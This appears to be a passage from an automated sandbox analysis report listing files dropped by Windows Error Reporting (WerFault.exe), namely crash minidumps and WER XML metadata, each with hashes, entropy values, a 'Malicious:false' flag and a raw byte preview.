                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4720
                  Entropy (8bit):4.490172200774156
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zsDJg77aI9V8ZTWpW8VYj8Ym8M4JAtFjd+q8vdEvmZltId:uIjfdI7j8Zi7VcJgdKyvmZltId
                  MD5:D0E1A2143BF8CAF5889071A617591D81
                  SHA1:5C8A940E51B4049DAEDD1343C3D8B82A634F462B
                  SHA-256:4671EAC3B23D4341D321ACA2EEF4184C32A6107590A00D4E903C89F1670DC0C5
                  SHA-512:A3F3002CEBAB34EB828482F3F9C5B91245154A5829BD8C9427F1473D170F741FFF3D984F67F70E214F3F10082D275DB035BF9D5564C59B7ACF2ACFF1D3F0E74C
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="515495" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4720
                  Entropy (8bit):4.4890113955660365
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zsDJg77aI9V8ZTWpW8VYjDvYm8M4JAtFb++q8vdEvmZltId:uIjfdI7j8Zi7V8yJ/KyvmZltId
                  MD5:13DF243A9E436BF617C0A743D42E8433
                  SHA1:96A9643D7924276B0CC5B08329150A0AE64B801A
                  SHA-256:77526C79AAF7C4D36BFD68040E452FCB987BA642AE3C19B46706A522853AEE09
                  SHA-512:6810076F68D550A5375B447E622BB6CB36F0F4970BAC24AE720722F15BA3F93B225215C6634D6FCE818866584C15F9DE71CD0582D1DBAD4193FC4E000C772BF0
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="515495" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 15 streams, Wed Sep 25 08:32:38 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):90490
                  Entropy (8bit):2.1658464532512696
                  Encrypted:false
                  SSDEEP:384:+mEqMwrHpuUl/KOIA8d/I+xKJ3trgSKHKLOjz4mDx2W0:+m3xHp3OJj8dO9z4mDxr0
                  MD5:D9CBA8C6E47F0319EF36C49339FA13FC
                  SHA1:73992E502315647818230758B79902F1BE06AF2D
                  SHA-256:C474C208B1B4CCCEE86DA0B03C5EBB727BFB2A5AD85012BE638B5501625A7B87
                  SHA-512:2D41861A3AB56F5B293F1E19F62809CFE30A555B5201818FB1957884C4022F93550311D056D59497417CED8F77065208F8C83395524DC7EF7594AB2167DB4079
                  Malicious:false
                  Preview:MDMP..a..... ..........f........................P...........<................=..........`.......8...........T............#...=..........T...........@...............................................................................eJ..............GenuineIntel............T.......<......f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8412
                  Entropy (8bit):3.703698365506999
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJnh6I686Y2DfSUEVloggmfGUpBT89bKQsf0VXum:R6lXJh6I686YySUEVdgmfGnKjfsn
                  MD5:50387BF4BCDBF06D9EFEDA2887A6ACD0
                  SHA1:A2B06857FCE932F81358CEFB976A88CEF1CD222D
                  SHA-256:18669B2AF22478EB15E11F315DA4C9D8E986F6DC1DBECCE24AA6A94A43052A78
                  SHA-512:89427F44486ADF0E13E18B330391B8FE907CAC5FB828AA27ABA671E89AD3CCD5E205DD0303E9A8664C6BDE71D812C097D06371356D9B96E39F2FF5E3D6EA2B71
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.1.6.<./.P.i.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4720
                  Entropy (8bit):4.487122130228046
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zsDJg77aI9V8ZTWpW8VYjYPYm8M4JAtFT4+q8vdEvmZltId:uIjfdI7j8Zi7VFSJBKyvmZltId
                  MD5:98112E3DC9AD3177901D9BCBB41229FA
                  SHA1:D253BD483815A3F03D2BFA5BD21273FCA6C3EB0B
                  SHA-256:37BF9A1DF25491C5C0FC3D7B3EF146591A1BB9CDA88F6B11B9C4E330CEDFA5B3
                  SHA-512:42B115AC6F03FC330EE31534B22AD0A4A743DF459D731D3C9618D08AEE4DE9BA49581AC93DBE3C85397204AEBAA0AD5CD7A2F4031449316CDB046C7FB9D22573
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="515495" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 15 streams, Wed Sep 25 08:32:39 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):114510
                  Entropy (8bit):2.2601946794541115
                  Encrypted:false
                  SSDEEP:384:D+qc1oOOXHp9knFHDg7/KDpV18Id/XaRLo8fElvzy3rgSBH7wljmW4Hce62Wy:D+qIqXHp9knFjgbgnSCDvz2CKLcv2d
                  MD5:85CA8ACFF0AE2B400ADF5EE835E1F56D
                  SHA1:4CA2FBEC9A997A0969C2F8EC730D443CFF02A289
                  SHA-256:D2D2DAF8433C1E5155C05B7E552EE890EA58B2B202831B66145CAE22F4481DB5
                  SHA-512:72B2324EA1B08F2E1B977618C0C9C950B6B43920299AA52D578162F92C62D181A4C7C1DA63D21235073C38BDA7F16C96B1B037C455F0A71E72532D4561858819
                  Malicious:false
                  Preview:MDMP..a..... ..........f........................`...(.......<...............\J..........`.......8...........T............+..F........................!..............................................................................eJ......H"......GenuineIntel............T.......<......f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8412
                  Entropy (8bit):3.703456482347133
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJnu6u6Y2DgSUpVTmgmfGUpBB89bVRQsfEcPXBm:R6lXJu6u6YNSUpVSgmfGtVRjfHP8
                  MD5:D4944988D6973878CCB716E45E4CE98F
                  SHA1:9A553215665201F00BCF56998E0D33B61A5A2855
                  SHA-256:700A4C5279A3E811121CCB4870D2DF57E8B9A97758FBDD15CB83EFA727E580E4
                  SHA-512:AB735575B1687251840BA5683A8204837E56268D56864D9A4A29BADD884E8AB0E7B3A3108DDC841F1B99AB0E4AF53A41138A68C9EBC40E5586C039AE01ECE14F
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.1.6.<./.P.i.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4720
                  Entropy (8bit):4.489709946911931
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zsDJg77aI9V8ZTWpW8VYjvYm8M4JAtF7YWm+q8vdEvmZltId:uIjfdI7j8Zi7VrJvWmKyvmZltId
                  MD5:C7B0DE7D05CB1B2CE2FB240DE51BF14D
                  SHA1:951F4F3FA221ECB47B265A3C1E294C5FDA2F6C86
                  SHA-256:69889CDC9721FA27D87FB608A55D85664ADD67BCF43DF002E036787F767413DD
                  SHA-512:79C870506E6344E9A53376000529ED6255F52AEBFB89319D4452D7B38C0A6B7BAC27EB77280A2D8FCCEB726D2CBA9C998F1CCC0FCD6B88C96590216D8002A7D2
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="515495" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 15 streams, Wed Sep 25 08:32:40 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):108858
                  Entropy (8bit):2.1669099162936214
                  Encrypted:false
                  SSDEEP:768:NWREUuHp9eU63foxYwLCTBaSDv921OnIeJ:N4xO9eU6vEHLCTYSDv92snVJ
                  MD5:3D84967B45D2DE02704C35B5669923A5
                  SHA1:76AA683ED99A9A742DF2B58B5C5A639DC5BDE101
                  SHA-256:144B13C749B1C1ED44D6D604957C570934ECCBC73337001EE8613E11288CE531
                  SHA-512:D493AB8E4253FF4ACF49E25BC18DFBF5385DE7B89F734AEB20BB2730BF21A74BA073F397F3768764C8FD0B2F738E9893FF3DDF8B9D1FD0AEC8F017FC86C3E586
                  Malicious:false
                  Preview:MDMP..a..... ..........f............................(.......<................J..........`.......8...........T........... ,...}..........0 ..........."..............................................................................eJ......."......GenuineIntel............T.......<......f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8418
                  Entropy (8bit):3.7048857283321848
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJn863Nv6Y2DdSU9EVDkgmfGUpBr89blQsfmXm:R6lXJ863Nv6YwSU9EVAgmfG/ljfH
                  MD5:E1CFCC64E226D7F9B994C07B26BFA149
                  SHA1:1262BD186D1E386B1BA9B5A30F40A00F6F257101
                  SHA-256:05292812ED2801B9813B58BBD0F239E4CAD9B19AEA01243E3BB4127E7DE9F3E4
                  SHA-512:EAF2C9C294B713588F46FBCF6AAA770AD597432CEBFE49D0AA453703A3C00CE1DE4D503CA5305A6A388F65678A69A470D66DF5AA5CD0503A87E4D354DC660841
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.1.6.<./.P.i.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4720
                  Entropy (8bit):4.488077672339781
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zsDJg77aI9V8ZTWpW8VYjbYm8M4JAtFWp+q8vdEvmZltId:uIjfdI7j8Zi7V3JHpKyvmZltId
                  MD5:29F945C5076FBBA57687685F67875E7B
                  SHA1:D5FDF1F12BA244B0C03F636A70117F07E4C29FA9
                  SHA-256:0B5089C27D08B03A699E05F9739C490B6BF3833ABDDA5CCE5D1CD903AAED7DF0
                  SHA-512:6B52CD253050B026377BEA0BEC5498725F6D27C8BDEC1124734689CCE3E98372ECB1F5F8F30E4AFAE52AAD878AE326CE584ED56F759B76020264211B8F8512D6
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="515495" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 15 streams, Wed Sep 25 08:32:41 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):122990
                  Entropy (8bit):2.2779590549872824
                  Encrypted:false
                  SSDEEP:384:z/UIg7/xQHp9qdTX/K4nXHbOcrlJVqgf4b/XSwHFpfEl3aoqrgSBX8FwrcLad5yK:z/9MqHp9mTPtRppkK2+39Wp4La3yJRG
                  MD5:0340D2C43A07E57C78AD818591B0C06C
                  SHA1:526AB0741E88F1FDF3004BF6B209AAEF45611F74
                  SHA-256:99EA2392CAEB5FB910F008A74CD6D78E7D8483E437A5D44413FDFF8258427AE7
                  SHA-512:3DE5117ED9D50367DEC465ABDEED1DA7B5866EBC5D6A2F69EBEB00D183211B042D972A484ABC0F4C05943C7F6D82BA1676A99FE86CDCF052F112CC5439D4B527
                  Malicious:false
                  Preview:MDMP..a..... ..........f............D...........8...X.......<.... ..........vN..........`.......8...........T...........(...F............ ..........."..............................................................................eJ......P#......GenuineIntel............T.......<......f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8418
                  Entropy (8bit):3.7031843155612583
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJnk6q6Y2DlSU9KVSZgmfGUpB089bcQsfTsUm:R6lXJk6q6YISU9KVMgmfGCcjfT2
                  MD5:4D165D06CE2855E17B0ED3E1DF819E13
                  SHA1:920A8B8FC041DD3011141D7454116FBBAF5CF4D9
                  SHA-256:3E4CFC3C6342ECEFE66AC4EDA0BD3FFE1CF6441D6DE1890D3AE7EA2B58FF9E63
                  SHA-512:19C59C88AC289249E09DA136F49A58AB7C22601722F598EE0F7FEEB7AA1008C2B0EFDAF1B92624325C8699FE4AB54A05E17C940E28CC426401A254FA90DCBC19
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.1.6.<./.P.i.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4720
                  Entropy (8bit):4.489737211874872
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zsDJg77aI9V8ZTWpW8VYjR7Ym8M4JAtFHfD+q8vdEvmZltId:uIjfdI7j8Zi7VUeJEfDKyvmZltId
                  MD5:B3681817A647EE07E9525478E72A80C8
                  SHA1:4CFFAA7A40641E20922DD439F0B9E41072ED3F49
                  SHA-256:5A954262E7D89F3A2A6EBE0619310A04464D277CB8E59C1E8D34C0B97552C80E
                  SHA-512:FB371A15616D4F146C283A712982C97B91B51DEC376E9C4A999B3BB531CEBABF9416CDDD5902D86E70AE5049C4E5444B7A3FBB8073D94CE6BD4625F74703A8DA
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="515495" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 15 streams, Wed Sep 25 08:32:43 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):48558
                  Entropy (8bit):2.7737437613623785
                  Encrypted:false
                  SSDEEP:384:h7E0VmXEJElHp9rorGCiwgSBDwKRsjZvfSGl:h7JMUOlHp9KSRV
                  MD5:A433512DD989546C686F9D808CD13767
                  SHA1:72027170CD3385360D62B7B7FE96D6FCE04DB922
                  SHA-256:301128DFF42FF700D0A2275DE2102406F11155814CC669C3C095843A424BC5C7
                  SHA-512:FAA52290A61D3A18FD4039E0BE76118B17251CBB6C79D954F20343427212618CF4F6D47650E5C37A82C4CBAFEA959275926DE6D307D79D83CEF82A136C83318D
                  Malicious:false
                  Preview:MDMP..a..... ..........f............4........... ...H.......<...h$..........|5..........`.......8...........T............:...............$...........&..............................................................................eJ......('......GenuineIntel............T.......<......f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8316
                  Entropy (8bit):3.703136535479113
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJnjV6d96Y2DHSU95VXdgmf1ZNDpD789bOQsfgP6m:R6lXJjV636YqSU95VNgmf1ZN6Ojfy
                  MD5:ACE7C95048038A73BD4CC0B32C124942
                  SHA1:1DA21EFEBCEA2D75C1F122714002C20510D07A12
                  SHA-256:4DA19B07D438B42CB7004331E099FEB3264014F9F7E17214A105C533E29D74C4
                  SHA-512:7767C83B66E7189004ED7214E004BD5F935A732B173EB9B7824FD59EE51DF4B3597D06EED465B250B42A31A8A7FB2B0623D813212D898F12FB19975875E15D38
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. 